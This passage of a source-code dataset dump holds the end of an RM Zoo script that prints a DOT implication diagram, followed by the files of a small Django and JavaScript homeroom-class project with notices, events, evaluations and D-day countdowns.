equivalent[(currentPrimary,b)]:\n if found:\n toRemove.add(b)\n else:\n if currentPrimary in primary:\n toRemove.add(currentPrimary)\n currentPrimary = b\n found = True\n if currentPrimary not in primary:\n primary.add(currentPrimary)\n primaryIndex.append(currentPrimary)\n for x in toRemove:\n primaryIndex.remove(x)\n primary.difference_update(toRemove)\n \n for a in principles: # Remove facts involving non-primary principles\n if a not in primary:\n for b in principles:\n printImplies[(a,b)] = False\n printImplies[(b,a)] = False\n \n printNotImplies[(a,b)] = False\n printNotImplies[(b,a)] = False\n \n printConservative[(a,b)] = Form.none\n\n # Remove redundant implications\n \n for a in primary:\n for b in primary:\n for c in primary: # Remove implications obtained by transitivity\n if simpleImplies[(b,a)] and simpleImplies[(a,c)]:\n printImplies[(b,c)] = False\n\n # Remove redundant non-implications\n\n for a in primary:\n for b in primary:\n if b == a: continue\n for c in primary:\n if c == a or c == b: continue\n \n if simpleNotImplies[(a,c)] and simpleImplies[(b,c)]: # If a -|> c, but b -> c, then a -|> b.\n printNotImplies[(a,b)] = False\n if simpleImplies[(c,a)] and simpleNotImplies[(c,b)]: # If c -> a, but c -|> b, then a -|> b.\n printNotImplies[(a,b)] = False\n \n # Remove redundant conservation facts\n\n for a in primary: # Remove conservation results obtained by transitivity\n for b in primary:\n if b == a: continue\n for c in primary:\n if c == a or c == b: continue\n \n if simpleImplies[(a,b)]:\n 
printConservative[(b,c)] &= ~simpleConservative[(a,c)]\n if simpleImplies[(b,c)]:\n printConservative[(a,b)] &= ~simpleConservative[(a,c)]\n \n # Generate open implications\n\n for a in primary:\n for b in primary:\n if b == a: continue\n \n if not simpleImplies[(a,b)] and not simpleNotImplies[(a,b)]:\n printWeakOpen[(a,b)] = True\n printStrongOpen[(a,b)] = True\n\n for a in primary:\n for b in primary:\n if b == a: continue\n for c in primary:\n if c == a or c == b: continue\n \n if simpleImplies[(c,a)] and not simpleImplies[(c,b)] and not simpleNotImplies[(c,b)]: # c -> a, c ? b\n printWeakOpen[(a,b)] = False\n if simpleImplies[(c,a)] and not simpleImplies[(b,a)] and not simpleNotImplies[(b,a)]: # c -> a, b ? a\n printWeakOpen[(b,c)] = False\n \n if simpleImplies[(a,c)] and not simpleImplies[(c,b)] and not simpleNotImplies[(c,b)]: # a -> c, c ? b\n printStrongOpen[(a,b)] = False\n if simpleImplies[(a,c)] and not simpleImplies[(b,a)] and not simpleNotImplies[(b,a)]: # a -> c, b ? a\n printStrongOpen[(b,c)] = False\n \n # Find all equivalent principles\n \n equivSet = defaultdict(set)\n for a in primary:\n for b in principles:\n if equivalent[(a,b)]:\n equivSet[a].add(b)\n \n##################################################################################\n#\n# IF DIAGRAM: PRINT OUT THE DOT FILE\n#\n################################################################################## \n\nif Implications or NonImplications or Weak or Strong or ShowForm or Conservation:\n\n eprint(u'Printing DOT file...')\n eprint(\"\\tDiagram contains {0} non-equivalent principles.\".format(len(primary)))\n\n print(\"\"\"//\n// RM Zoo (v\"\"\" + Version + \"\"\")\n//\n\ndigraph G {\n\ngraph [\n rankdir = TB // put stronger principles higher up\n ranksep = 1.5\n ]\n\n//\n// Node Styles\n//\n\nnode [shape=none,color=white];\n\n//\n// Data\n//\"\"\")\n\n if Implications:\n \n for a in primary:\n for b in primary:\n if printImplies[(a,b)]:\n style = []\n if printNotImplies[(b,a)] and not NonImplications:\n style.append(u'color = \"black:white:black\"')\n if len(equivSet[a]) > 0 and not OnlyPrimary:\n style.append(u'minlen = 2')\n s = u''\n if len(style) > 0:\n s = u' [{0}]'.format(u', '.join(style))\n print(u'\" {0} \" -> \" {1} \"{2}'.format(a,b,s))\n \n if NonImplications:\n \n for a in primary:\n for b in primary:\n if printNotImplies[(a,b)]:\n print(u'\" {0} \" -> \" {1} \" [color = \"red\"]'.format(a,b))\n \n if not OnlyPrimary:\n for a in primary:\n for b in equivSet[a]:\n print(u'\" {0} \" -> \" {1} \" [dir = both]'.format(a,b))\n \n if Weak:\n for a in primary:\n for b in primary:\n if printWeakOpen[(a,b)]:\n print(u'\" {0} \" -> \" {1} \" [color = \"green\"]'.format(a,b))\n \n if Strong:\n for a in primary:\n for b in primary:\n if printStrongOpen[(a,b)]:\n print(u'\" {0} \" -> \" {1} \" [color = \"orange\"]'.format(a,b))\n \n if ShowForm:\n for a in principles:\n if a in form:\n if form[a] != Form.none:\n print(u'\" {0} \" [shape=box, style=filled, fillcolor={1}]'.format(a, _FORM_COLOR[form[a]]))\n \n \n if Conservation:\n for a in primary:\n for b in primary:\n if a == b: continue\n \n if printConservative[(a,b)] != Form.none:\n print(u'\" {0} \" -> \" {1} \" [color = \"{2}\"]'.format(a,b, _CONS_COLOR[printConservative[(a,b)]]))\n\n print(u'}')\n eprint(u'Finished.')\n\n" } ]
7
MAHT1990/HomeRoom_Project
https://github.com/MAHT1990/HomeRoom_Project
6a653ad946ed41aff5baebe34d2f17e8c4150127
9141ac1d9838b033d79e5add7db91f368c58ea36
b1a584973d1205da924dc61e7a4bedd3786dc6f0
refs/heads/master
2023-02-15T02:11:45.585875
2021-01-05T14:02:06
2021-01-05T14:02:06
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7012835741043091, "alphanum_fraction": 0.7012835741043091, "avg_line_length": 29.60714340209961, "blob_id": "f1cc57a755eec144b7153a8fc69f5c9e23df8168", "content_id": "64daf1646926c522cc340e90536a05348c95db92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 857, "license_type": "no_license", "max_line_length": 64, "num_lines": 28, "path": "/dot/admin.py", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import *\n# Register your models here.\n\[email protected](State)\nclass StateAdmin(admin.ModelAdmin):\n list_display=['id','state']\n list_display_links=['id','state']\n\[email protected](Notice)\nclass NoticeAdmin(admin.ModelAdmin):\n list_display=['id','content']\n list_display_links=['id','content']\n\[email protected](NoticeDetail)\nclass NoticeDetailAdmin(admin.ModelAdmin):\n list_display=['id','detail','notice']\n list_display_links=['id','detail','notice']\n\[email protected](EventSet)\nclass EventSetAdmin(admin.ModelAdmin):\n list_display=['id','dayname','day','lastday','image']\n list_display_links=['id','dayname','image']\n\[email protected](Eval)\nclass EvalAdmin(admin.ModelAdmin):\n list_display=['id','type','dayname','day','lastday','image']\n list_display_links=['id','dayname','image']\n" }, { "alpha_fraction": 0.6913061738014221, "alphanum_fraction": 0.6921461820602417, "avg_line_length": 27.177515029907227, "blob_id": "add6107fde49f9cb54def26040b14385c9f66030", "content_id": "557136a33198621c5835167fbf6089f2abfef710", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5110, "license_type": "no_license", "max_line_length": 98, "num_lines": 169, "path": "/dot/views.py", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import *\n# Create your views here.\n\n\n\ndef page1(request):\n return redirect(\"dot:morning_assemble\")\n\n\ndef calendar(request):\n EventSets = EventSet.objects.all()\n # EventSets 는 queryset임.\n # 여기서 데이터베이스에 접근 할 줄 알지만, 그것이 아니다.\n # queryset 형태로 가져옴 . 
an object holding the SQL used to access the database.\n # Therefore you can still filter with the .filter method before the database is actually hit.\n # Using queryset.filter you can build yet another filtered queryset.\n # A queryset is a Django data type that carries SQL.\n # chaining (stacking more conditions on top; filter)\n # lazy (keeps deferring, only touching the database when strictly necessary)\n\n Evals = Eval.objects.all()\n content = {\n 'EventSets': EventSets,\n 'Evals': Evals,\n }\n\n return render(request, 'dot/calendar.html', content)\n # The data is pulled from the database when it is handed to the template.\n\n\ndef calendar_next(request):\n return render(request, 'dot/calendar_next.html')\n\n@csrf_exempt\ndef morning_assemble(request):\n States = State.objects.last()\n Notices = Notice.objects.all()\n EventSets = EventSet.objects.all()\n Evals = Eval.objects.all()\n\n response_data = {\n 'status': 200,\n 'msg': 'success',\n 'States': States,\n 'Notices': Notices,\n 'EventSets': EventSets,\n 'Evals': Evals,\n # TODO: EventSets and Evals\n }\n\n return render(request, 'dot/morning_assemble.html', response_data)\n\n\ndef time_table(request):\n return render(request, 'dot/time_table.html')\n\n\ndef create_delete(request):\n States = State.objects.last()\n Notices = Notice.objects.all()\n EventSets = EventSet.objects.all()\n Evals = Eval.objects.all()\n\n content = {\n 'States': States,\n 'Notices': Notices,\n 'EventSets': EventSets,\n 'Evals': Evals,\n }\n return render(request, 'dot/create_delete.html', content)\n\n\n# TODO: clean up the API (write a separate function for each method and reorganize.)\ndef Create_State(request):\n user_input_state = request.POST.get(\"State_state\")\n\n new_State = State(state=user_input_state)\n new_State.save()\n return HttpResponseRedirect(reverse(\"dot:create_delete\"))\n\n\ndef Create_Notice(request):\n user_input_notice = request.POST.get('Notice_content')\n\n new_Notice = Notice(content=user_input_notice)\n new_Notice.save()\n return HttpResponseRedirect(reverse(\"dot:create_delete\"))\n\n\ndef Create_NoticeDetail(request):\n noticedetail_object_id = request.POST.get(\"Notice_id\")\n noticedetail_object_detail = request.POST.get(\"NoticeDetail_detail\")\n noticedetail_object = Notice.objects.get(id=noticedetail_object_id)\n\n new_noticedetail = NoticeDetail(notice=noticedetail_object, detail=noticedetail_object_detail)\n new_noticedetail.save()\n\n return HttpResponseRedirect(reverse('dot:create_delete'))\n\n\ndef Delete_Notice(request):\n delete_id = request.GET['Notice_id']\n\n delete_Notice = Notice.objects.get(id=delete_id)\n delete_Notice.delete()\n return HttpResponseRedirect(reverse('dot:create_delete'))\n\n\ndef Delete_NoticeDetail(request):\n delete_id = request.GET['NoticeDetail_id']\n\n delete_NoticeDetail = NoticeDetail.objects.get(id=delete_id)\n delete_NoticeDetail.delete()\n return HttpResponseRedirect(reverse('dot:create_delete'))\n\n\ndef Create_EventSet(request):\n # return HttpResponse('add!')\n user_input_day = request.POST.get('EventSet_day')\n user_input_lastday = request.POST.get('EventSet_lastday')\n user_input_dayname = request.POST.get('EventSet_dayname')\n\n new_EventSet = EventSet(\n day=user_input_day,\n lastday=user_input_lastday,\n dayname=user_input_dayname\n )\n new_EventSet.save()\n\n # return redirect(\"dot:morning_assemble\")\n return HttpResponseRedirect(reverse(\"dot:create_delete\"))\n # return HttpResponse(user_input_dayname + user_input_day + user_input_lastday)\n\n\ndef Create_Eval(request):\n user_input_type = request.POST['Eval_type']\n user_input_day = request.POST['Eval_day']\n user_input_lastday = request.POST['Eval_lastday']\n user_input_dayname = request.POST['Eval_dayname']\n\n new_Eval = Eval(\n 
type=user_input_type,\n day=user_input_day,\n lastday=user_input_lastday,\n dayname=user_input_dayname\n )\n new_Eval.save()\n\n return HttpResponseRedirect(reverse(\"dot:create_delete\"))\n\n\ndef Delete_EventSet(request):\n delete_id = request.GET['EventSet_id']\n\n delete_EventSet = EventSet.objects.get(id=delete_id)\n delete_EventSet.delete()\n return HttpResponseRedirect(reverse('dot:create_delete'))\n\n\ndef Delete_Eval(request):\n delete_id = request.GET['Eval_id']\n\n delete_Eval = Eval.objects.get(id=delete_id)\n delete_Eval.delete()\n return HttpResponseRedirect(reverse('dot:create_delete'))\n" }, { "alpha_fraction": 0.6865671873092651, "alphanum_fraction": 0.6971631050109863, "avg_line_length": 28.200000762939453, "blob_id": "e98a21896f88094a4112e61225b010524c86a749", "content_id": "d8d8e0db6bd64b05b1bab9c03d6bd7b602ee37bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1892, "license_type": "no_license", "max_line_length": 69, "num_lines": 50, "path": "/dot/models.py", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\n\nclass State(models.Model):\n state=models.CharField(max_length=255)\n\n def __str__(self):\n return self.state\n \nclass Notice(models.Model):\n content=models.CharField(max_length=255)\n\n def __str__(self):\n return self.content\n\nclass NoticeDetail(models.Model):\n detail=models.CharField(max_length=255)\n notice=models.ForeignKey(Notice, on_delete=models.CASCADE)\n\ndef image_file_rename(instance, filename):\n return '{}.jpg'.format(instance.dayname)\nclass SpecialDay(models.Model):\n dayname = models.CharField(max_length = 255,null=True)\n day = models.DateField(null=True)\n lastday = models.DateField(null=True)\n image = models.ImageField(upload_to=image_file_rename, null=True)\n\n class Meta:\n abstract = True\n\nclass EventSet(SpecialDay):\n pass\n # Once a block is opened it must contain code;\n # if nothing else goes in, just write a pass statement.\n\nclass Eval(SpecialDay):\n type = models.CharField(max_length = 255,null=True)\n\n\n# Unify them: with null=True on the type field,\n# when the data reaches JAVASCRIPT, rows whose type is null go in as events,\n# and rows whose type is not null go in as Evals; unifying the database that way is also a good option.\n# Sometimes splitting is better, and sometimes merging is better.\n## Model the post title, the body, and the user info.\n## Inheritance may be used as well.\n## Making a parent class that both can inherit from is also a good approach.\n## Set abstract = True in class Meta so it is not actually reflected in the database.\n## But if creating an instance of the child class also created one for the parent, it would get complicated.\n## abstract does have the effect of not actually creating the table, but,\n" }, { "alpha_fraction": 0.7079287767410278, "alphanum_fraction": 0.7103559970855713, "avg_line_length": 60.79999923706055, "blob_id": "d0daa25c97638e15408a74049dc1652c05039e77", "content_id": "b679550bbc905be2597b094ef117c8dab06d4dbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1236, "license_type": "no_license", "max_line_length": 102, "num_lines": 20, "path": "/dot/urls.py", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('calendar_next/', views.calendar_next, name=\"calendar_next\"),\n path('calendar/', views.calendar, name=\"calendar\"),\n path('create_delete/Create_State/', views.Create_State, name=\"Create_State\"),\n path('create_delete/Create_NoticeDetail/', views.Create_NoticeDetail, name=\"Create_NoticeDetail\"),\n path('create_delete/Create_Notice/', views.Create_Notice, name=\"Create_Notice\"),\n path('create_delete/Delete_NoticeDetail/', views.Delete_NoticeDetail, name=\"Delete_NoticeDetail\"),\n path('create_delete/Delete_Notice/', views.Delete_Notice, name=\"Delete_Notice\"),\n path('create_delete/Create_EventSet/', views.Create_EventSet, name=\"Create_EventSet\"),\n path('create_delete/Create_Eval/', views.Create_Eval, name=\"Create_Eval\"),\n path('create_delete/', views.create_delete, name=\"create_delete\"),\n path('create_delete/Delete_EventSet/', views.Delete_EventSet, name=\"Delete_EventSet\"),\n path('create_delete/Delete_Eval/', views.Delete_Eval, name=\"Delete_Eval\"),\n path('page1/', views.page1, name=\"page1\"),\n path('time_table/', views.time_table, name=\"time_table\"),\n path('', views.morning_assemble, name=\"morning_assemble\"),\n]\n" }, { "alpha_fraction": 0.6865671873092651, "alphanum_fraction": 0.6865671873092651, "avg_line_length": 18.14285659790039, "blob_id": "137185e8c4f0cf436c397eec347ca34a68996bee", "content_id": "feb2502bb8a3de3608bf6923ac681edfd38df432", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 36, "num_lines": 7, "path": "/api/urls.py", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('eventset',views.eventset),\n path('eval',views.eval),\n]\n" }, { "alpha_fraction": 0.8269230723381042, "alphanum_fraction": 0.8269230723381042, "avg_line_length": 25, "blob_id": "ec3f0aeadd3341bbaa886bf172d11824bf234d8d", "content_id": "367944a304248c5a49a6e803e6c41e575b170315", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 52, "license_type": "no_license", "max_line_length": 32, "num_lines": 2, "path": "/README.md", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "# HomeRoom_Project\nVarious Tools for Homeroom_Class\n" }, { "alpha_fraction": 0.7283950448036194, "alphanum_fraction": 0.7283950448036194, "avg_line_length": 15.199999809265137, "blob_id": "4010f0ba7b6e0a2f4e5787bfa6d48f6a799cfa56", "content_id": "a66f5395b759526d7abba728bcd8eb9a7381c4e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 81, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/dot/apps.py", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass DotConfig(AppConfig):\n name = 'dot'\n" }, { "alpha_fraction": 0.5269590020179749, "alphanum_fraction": 0.5312724709510803, "avg_line_length": 24.290908813476562, "blob_id": "d3d29fd52a21f496531892215d65165b8c878ba0", "content_id": "9d183c0d0c9efe6713cfb0b1bce03627717a7cdd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1397, "license_type": "no_license", "max_line_length": 72, "num_lines": 55, "path": "/api/views.py", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "from django.shortcuts 
import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom dot.models import *\n\n# from dot's models\n\n# Create your views here.\n@csrf_exempt\ndef eventset(request):\n response_data = {\n 'status': 200,\n 'msg': 'success',\n 'data': []\n }\n\n if request.method == 'GET':\n EventSets = EventSet.objects.all()\n for eventset in EventSets:\n item = {\n 'id': eventset.id,\n 'dayname': eventset.dayname,\n 'day': eventset.day,\n 'lastday': eventset.lastday,\n 'image': None\n }\n response_data['data'].append(item)\n else:\n pass\n\n return JsonResponse(response_data)\n\ndef eval(request):\n response_data = {\n 'status': 200,\n 'msg': 'success',\n 'data': []\n }\n\n if request.method == 'GET':\n Evals = Eval.objects.all()\n for eval in Evals:\n item = {\n 'id': eval.id,\n 'type': eval.type,\n 'theday': eval.day,\n 'lastday': eval.lastday,\n 'dayname': eval.dayname\n }\n response_data['data'].append(item)\n else:\n pass\n\n return JsonResponse(response_data)\n" }, { "alpha_fraction": 0.5574886798858643, "alphanum_fraction": 0.6051437258720398, "avg_line_length": 27.12765884399414, "blob_id": "9db5ec7992888d6fa1a326bcf3ce75c40f5ccbd1", "content_id": "2318c413a748f47d15a33832cc0399dff0a2e42a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1568, "license_type": "no_license", "max_line_length": 88, "num_lines": 47, "path": "/@SAMPLES/js/Dday1.js", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "function Event(theday, dayname) {\n this.dayname = dayname;\n this.day = theday\n this.dday = function() {\n\n /*theday input format is 2020-00-00;\n single-digit months must also be zero-padded, e.g. 
2020-01-04\n */\n /* dayname : event name : string */\n\n var today = new Date();\n var theveryday = new Date(this.day);\n\n var today_seconds = today.getTime();\n var theveryday_seconds = theveryday.getTime();\n /* the getTime method returns the span from the epoch\n to the given time in units of 1/1000 of a second */\n\n /* write calls for debugging\n document.write(today + '<br />');\n document.write(today_seconds + '<br />');\n document.write(theveryday + '<br />');\n document.write(theveryday_seconds + '<br />');\n\n document.write(theveryday_seconds - today_seconds + '<br />')\n document.write(Math.ceil((theveryday_seconds - today_seconds)/86400000)+'<br />');\n */\n\n return [Math.ceil((theveryday_seconds - today_seconds)/86400000), dayname];\n /* subtract today's time from the event time, then divide by one day (86400 * 1000 milliseconds);\n then use the Math.ceil (round-up) method to return the number of days remaining,\n returning the dday value and the event name in the form of an Array. */\n\n }\n }\n\n\n /* Example */\n /*\n var someday = new Event(\"2020-05-28\",\"아무날\")\n document.write(someday.dday());\n document.write(someday.dayname)\n\n var oneday = new Event(\"2020-06-06\",\"현충일\")\n document.write(oneday.dday());\n document.write(oneday.dayname);\n */\n" }, { "alpha_fraction": 0.5453658699989319, "alphanum_fraction": 0.5549718737602234, "avg_line_length": 36.42977523803711, "blob_id": "63b3df9d6c4d5e8ac6b6e84145169a689a940467", "content_id": "0960f5f8f44b26e43748a28d92f269c3f4f01799", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 15499, "license_type": "no_license", "max_line_length": 150, "num_lines": 356, "path": "/dot/static/dot/js/Dday2.js", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "function EventSet(theday, lastday, dayname) {\n\tthis.dayname = dayname;\n\tthis.day = theday\n\tthis.lastday = lastday\n\tthis.dday = function() {\n\n\t\t/* theday, lastday input format is 2020-00-00;\n\t\tsingle-digit months must also be zero-padded, e.g. 2020-01-04 */\n\t\t/* dayname : event name : string */\n\t\t/* color : the color drawn on the calendar : string */\n\t\tvar today = new Date();\n\t\t// define the today variable using the Date object\n\t\tvar today_year = today.getFullYear();\n\t\t// use the getFullYear() method to get the current year into a variable.\n\t\tvar today_month = today.getMonth() + 1;\n\t\t// use the getMonth() method to get the month into a variable.\n\t\t// Caution! 
the getMonth() method returns the month as 0 ~ 11.\n\t\tvar today_date = today.getDate();\n\t\t// use the getDate() method to get the day of the month into a variable.\n\n\t\tvar today_form = new Date(today_year.toString() + '-' + today_month.toString() + '-' + today_date.toString());\n\t\t// defining today with new Date() includes hours/minutes/seconds, so they have to be cut off.\n\t\tvar theveryday = new Date(this.day);\n\n\t\tvar today_seconds = today_form.getTime();\n\t\tvar theveryday_seconds = theveryday.getTime() - 32400000;\n\t\t/* the getTime method returns the span from the epoch\n\t\tto the given time in units of 1/1000 of a second */\n\t\t/* the Date object puts its reference time at 9 AM, so\n\t\t9 hours' worth must be subtracted. */\n\n\t\treturn Math.ceil((theveryday_seconds - today_seconds) / 86400000);\n\t\t/* subtract today's time from the event time, then divide by one day (86400 * 1000 milliseconds);\n\t\tthen use the Math.ceil (round-up) method to return the number of days remaining,\n\t\treturning the dday value and the event name in the form of an Array. */\n\t} //--end of the dday method.\n\n\tthis.write_del = function() {\n\n\t\tEvnt_cntnt_line = document.createElement(\"div\");\n\t\tEvnt_cntnt_line.setAttribute(\"class\", \"Event_cntnt_line\");\n\t\tEvnt_cntnt_line.setAttribute(\"id\", this.dayname);\n\t\t// make a new row\n\t\t// create a div tag with the class Event_cntnt_line\n\n\t\tEvnt_cntnt = document.createElement(\"div\");\n\t\tEvnt_cntnt.setAttribute(\"class\", \"Event_cntnt\");\n\t\t// create the event-name cell.\n\t\t// create a div tag with the class Event_cntnt\n\n\t\tEvnt_cntnt_txt = document.createTextNode(this.dayname);\n\t\tEvnt_cntnt.appendChild(Evnt_cntnt_txt);\n\t\t// fill the event-name cell with its content.\n\t\t// fill the Event_cntnt div with Event_txt.\n\n\n\t\tEvnt_dday = document.createElement(\"div\");\n\t\tEvnt_dday.setAttribute(\"class\", \"Event_dday\");\n\t\t// create the event d-day cell.\n\t\t// create a div tag with the class Event_dday\n\t\tif (this.dday() > 0) {\n\t\t\t// vary the content and color of the dday cell according to the dday value.\n\n\t\t\tif (this.dday() < 10) {\n\t\t\t\tEvnt_dday_txt = document.createTextNode(\"D-0\" + this.dday());\n\t\t\t\tEvnt_dday.appendChild(Evnt_dday_txt);\n\t\t\t\t// fill the Event_dday cell. 
uses an if statement.\n\t\t\t\t// if dday is a single digit (<10), prefix it with 'D-0'.\n\t\t\t\tif (this.dday() <= 3) {\n\t\t\t\t\tEvnt_dday.style.backgroundColor = \"#ff004d\";\n\t\t\t\t} //--end of the dday<=3 case\n\t\t\t\telse {\n\t\t\t\t\tEvnt_dday.style.backgroundColor = \"#00b496\";\n\t\t\t\t}\n\t\t\t} //--end of the dday<10 case\n\t\t\telse {\n\t\t\t\tEvnt_dday_txt = document.createTextNode(\"D-\" + this.dday());\n\t\t\t\tEvnt_dday.appendChild(Evnt_dday_txt);\n\t\t\t\t// fill the Event_dday cell. uses an if statement.\n\t\t\t\t// if dday has two or more digits (>=10), prefix it with 'D-'.\n\t\t\t\tEvnt_dday.style.backgroundColor = \"#00b496\";\n\t\t\t} //--end of the dday>=10 case\n\n\t\t} //--end of the dday>0 case\n\t\telse if (this.dday() === 0) {\n\t\t\tEvnt_dday_txt = document.createTextNode(\"D-DAY\");\n\t\t\tEvnt_dday.appendChild(Evnt_dday_txt);\n\t\t\tEvnt_dday.style.backgroundColor = \"purple\";\n\t\t\t// when dday===0, make the dday cell purple.\n\t\t} //--end of the dday===0 case\n\t\telse if (this.dday() < 0) {\n\t\t\tif (this.dday() >= -3) {\n\t\t\t\tEvnt_dday_txt = document.createTextNode(\"종료\");\n\t\t\t\tEvnt_dday.appendChild(Evnt_dday_txt);\n\t\t\t\tEvnt_dday.style.backgroundColor = \"#2e2f4a\";\n\t\t\t\t//--when dday<0, make the dday cell navy.\n\t\t\t\tEvnt_cntnt.style.color = \"gray\";\n\t\t\t}\n\n\t\t} //--end of the dday<0 case.\n\n\t\t// the case where the date was not entered properly.\n\t\t// it may be left blank intentionally (to announce a date range, etc.)\n\t\telse {\n\t\t\tEvnt_dday.style.backgroundColor = \"white\";\n\t\t\t// set the background to white,\n\t\t\tEvnt_dday.style.borderBottom = \"1px solid gray\";\n\t\t\t// and lay a gray underline beneath it.\n\t\t}\n\n\t\t// take the Evnt_cntnt and Evnt_dday built by the conditions above,\n\t\t// put them in Evnt_cntnt_line, then into Evnt_cntnt_box to finish the insertion.\n\t\tEvnt_cntnt_line.appendChild(Evnt_cntnt);\n\t\tEvnt_cntnt_line.appendChild(Evnt_dday);\n\t\t// this is the code that actually fills Event_cntnt_line with content.\n\n\t\t// event wiring //\n\t\tEvnt_cntnt_line.addEventListener('mouseover', function() {\n\t\t\tthis.style.backgroundColor = 'navy';\n\t\t\tthis.style.color = 'white';\n\t\t})\n\n\t\tEvnt_cntnt_line.addEventListener('mouseout', function() {\n\t\t\tthis.style.backgroundColor = '#f5f5ff';\n\t\t\tthis.style.color = 'black';\n\t\t})\n\n\t\tEvnt_cntnt_line.addEventListener('click', Evnt_Pop);\n\n\t\tdocument.getElementById('Event_cntnt_box').appendChild(Evnt_cntnt_line)\n\t\t// this is the code that actually inserts Event_cntnt_line into Event_cntnt_box.\n\n\t\tif (this.dday() < -3) {\n\t\t\tEvnt_cntnt_line.remove();\n\t\t\tEvnt_cntnt.remove();\n\t\t\tEvnt_cntnt_txt.remove();\n\t\t\tEvnt_dday.remove();\n\t\t} // once 3 days have passed since the event ended, remove the tags.\n\n\t} //--end of this.write_del.\n\n\n\t////////////////////////////////////////////////////////////////////////\n\t////////////////////////////////////////////////////////////////////////\n\t//////////////////////////calendar function Start///////////////////////\n\t////////////////////////////////////////////////////////////////////////\n\t////////////////////////////////////////////////////////////////////////\n\n\tthis.calendar = function() {\n\n\t\tvar StartDate = new Date(this.day);\n\t\tvar FinishDate = new Date(this.lastday);\n\t\tStartDate_Date = StartDate.getDate();\n\t\tStartDate_Month = StartDate.getMonth() + 1;\n\t\tFinishDate_Date = FinishDate.getDate();\n\t\tFinishDate_Month = FinishDate.getMonth() + 1;\n\t\t// define the day and month of the start date.\n\t\t// define the day and month of the end date.\n\n\t\tif (StartDate_Month !== today.getMonth() + 1) {\n\t\t\tconsole.log('over')\n\t\t} else if (StartDate.getFullYear().toString() + '-' + StartDate_Month.toString() + '-' + StartDate_Date.toString() ===\n\t\t\tFinishDate.getFullYear().toString() + '-' + FinishDate_Month.toString() + '-' + FinishDate_Date.toString()) {\n\t\t\tEvnt_target_box = document.getElementById(StartDate.getFullYear().toString() + '-' + StartDate_Month.toString() + '-' + StartDate_Date.toString());\n\n\t\t\tEvnt_calendar_line = document.createElement('div');\n\t\t\tEvnt_calendar_line.setAttribute(\"class\", \"Evnt_calendar_line\");\n\t\t\tEvnt_calendar_line.setAttribute(\"id\", this.dayname);\n\t\t\t// create a div tag whose class name is Evnt_calendar_line.\n\t\t\t// the id is named after the event; 
it is set to this.dayname.\n\t\t\tEvnt_calendar_line.addEventListener(\"click\", Evnt_Pop);\n\t\t\tEvnt_calendar_line.textContent = this.dayname;\n\t\t\t// the cell at the start date gets the event's name.\n\t\t\tEvnt_calendar_line.style.backgroundColor = \"rgba(0,\" + Math.round(Math.random() * 150) + \",\" + Math.round(Math.random() * 100) + \",0.35)\";\n\t\t\tEvnt_calendar_line.style.color = \"black\";\n\t\t\t// assign the color that represents the event.\n\n\t\t\tEvnt_target_box.appendChild(Evnt_calendar_line);\n\t\t} else {\n\t\t\tbackgroundColor = \"rgba(0,\" + Math.round(Math.random() * 150) + \",\" + Math.round(Math.random() * 100) + \",0.35)\";\n\t\t\t// when an Eval runs over several days, the background color must stay the same throughout.\n\t\t\t// the color has to be defined before the for loop runs.\n\t\t\tfor (var i = StartDate_Date; i <= FinishDate_Date; i++) {\n\t\t\t\t// loop from the day of the start date through the day of the end date.\n\t\t\t\tEvnt_target_box = document.getElementById(StartDate.getFullYear().toString() + '-' + StartDate_Month.toString() + '-' + i.toString());\n\t\t\t\t// use the getElementById method to find the div tag of each target date,\n\t\t\t\t// locating the div of every date from the start date to the end date.\n\t\t\t\tif (i == StartDate_Date) {\n\t\t\t\t\tEvnt_calendar_line = document.createElement('div');\n\t\t\t\t\tEvnt_calendar_line.setAttribute(\"class\", \"Evnt_calendar_line\");\n\t\t\t\t\tEvnt_calendar_line.setAttribute(\"id\", this.dayname);\n\t\t\t\t\t// create a div tag whose class name is Evnt_calendar_line.\n\t\t\t\t\t// the id is named after the event; it is set to this.dayname.\n\t\t\t\t\tEvnt_calendar_line.addEventListener(\"click\", Evnt_Pop);\n\t\t\t\t\tEvnt_calendar_line.textContent = this.dayname;\n\t\t\t\t\t// the cell at the start date gets the event's name.\n\t\t\t\t\tEvnt_calendar_line.style.background = backgroundColor;\n\t\t\t\t\t// assign the color that represents the event.\n\t\t\t\t\tEvnt_target_box.appendChild(Evnt_calendar_line);\n\t\t\t\t\t// put the 